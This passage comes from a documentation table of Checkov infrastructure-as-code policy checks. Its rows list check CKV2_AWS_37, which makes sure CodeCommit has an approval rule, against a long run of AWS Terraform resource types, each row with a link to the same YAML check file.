[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 860 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 861 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 862 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 863 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 864 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 865 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 866 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 867 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 868 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 869 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 870 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 871 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 872 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 873 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 874 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 875 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 876 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 877 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 878 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 879 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 914 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an 